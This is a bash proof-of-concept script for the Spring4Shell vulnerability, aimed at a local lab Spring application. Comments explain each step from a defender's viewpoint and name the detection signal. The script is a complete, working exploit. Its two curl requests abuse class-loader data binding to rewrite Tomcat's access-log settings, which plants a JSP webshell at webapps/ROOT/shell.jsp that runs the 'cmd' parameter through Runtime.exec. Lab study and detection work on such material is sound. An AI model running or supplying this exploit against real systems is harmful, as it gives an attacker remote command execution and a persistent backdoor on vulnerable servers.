# reference: https://github.com/reznok/Spring4Shell-POC/blob/master/exploit.py
#
# Spring4Shell proof-of-concept aimed at a local lab target
# (http://localhost:8080/spring4shell/hello). Flat bash script: no shebang and
# no `set -e`, so it is meant to be invoked as `bash exploit.bash`, and a failed
# curl does not stop the later steps.
#
# Defender's reading of the two requests below:
#   * Every parameter name starts with
#     `class.module.classLoader.resources.context.parent.pipeline.first.` —
#     request data binding is walking from the bound object's `class` property
#     through the class loader to the container's access-log valve. Parameter
#     names beginning with `class.module.classLoader` in web-server / WAF logs
#     are the detection signal for this technique; patched Spring Framework
#     releases refuse to bind that path.
#   * Because of `-G`, each `-d` is sent as a query-string parameter, not a body.
#   * `%{prefix}i`, `%{c}i` and `%{suffix}i` in the log pattern use the
#     access-log pattern syntax for "value of request header <name>", and the
#     same request supplies those headers (`prefix: <%`, `suffix: %>`,
#     `c: Runtime`) so the literal `<%`, `Runtime` and `%>` never appear in the
#     query string.
#   * Nothing here restores the original access-log configuration or removes
#     the files written under webapps/ROOT; lab cleanup is manual.
echo "----------------------------------------------------------------------------------------------------"
# Banner (Japanese): "changing the log output destination to webapps/ROOT/shell.jsp..."
echo "ログの出力先をwebapps/ROOT/shell.jspに変更しています…"
echo "----------------------------------------------------------------------------------------------------"
# Step 1: repoint the access log so its file name becomes webapps/ROOT/shell.jsp
# (`directory=webapps/ROOT`, `prefix=shell`, empty `fileDateFormat`,
# `suffix=.jsp`). Decoded, the `pattern` value is JSP source that passes the
# `cmd` request parameter to Runtime.exec and prints the process output; once
# the valve writes a log line, /shell.jsp on the target is a command-execution
# endpoint. This request is the impact, and is what a WAF / log rule should
# catch. (Comments cannot go between the `\`-continued lines below: a `#` after
# a continuation would swallow the rest of the command.)
curl -v -G \
-H "prefix:<%" \
-H "suffix:%>" \
-H "c:Runtime" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" \
"http://localhost:8080/spring4shell/hello"
# Presumably gives the container time to apply the new valve settings and
# write the log file before the next request arrives — TODO confirm; the script
# never checks that shell.jsp actually exists.
sleep 5
echo "----------------------------------------------------------------------------------------------------"
# Banner (Japanese): "changing the log output destination to another location..."
echo "ログの出力先を別の場所に変えてます…"
echo "----------------------------------------------------------------------------------------------------"
# Step 2: move the access log away again (`pattern=a`, `prefix=temp`,
# `fileDateFormat=_`, `suffix=.txt`, same directory), so later requests are
# logged to something like webapps/ROOT/temp_.txt rather than appended to
# shell.jsp — presumably to keep further log lines from corrupting the JSP;
# verify against the referenced exploit.py. The `prefix`/`suffix`/`c` headers
# are still sent but the one-character pattern no longer references them.
# Note the valve is left pointing at this second file, not at its original
# location.
curl -v -G \
-H "prefix:<%" \
-H "suffix:%>//" \
-H "c:Runtime" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=a" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.txt" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.prefix=temp" \
-d "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_" \
"http://localhost:8080/spring4shell/hello"
sleep 5
echo "----------------------------------------------------------------------------------------------------"
# Banner (Japanese): "please access here: http://localhost:8080/shell.jsp?cmd=id".
# The script does not verify success itself; the operator checks by hand.
echo "こちらにアクセスしてください: http://localhost:8080/shell.jsp?cmd=id"
echo "----------------------------------------------------------------------------------------------------"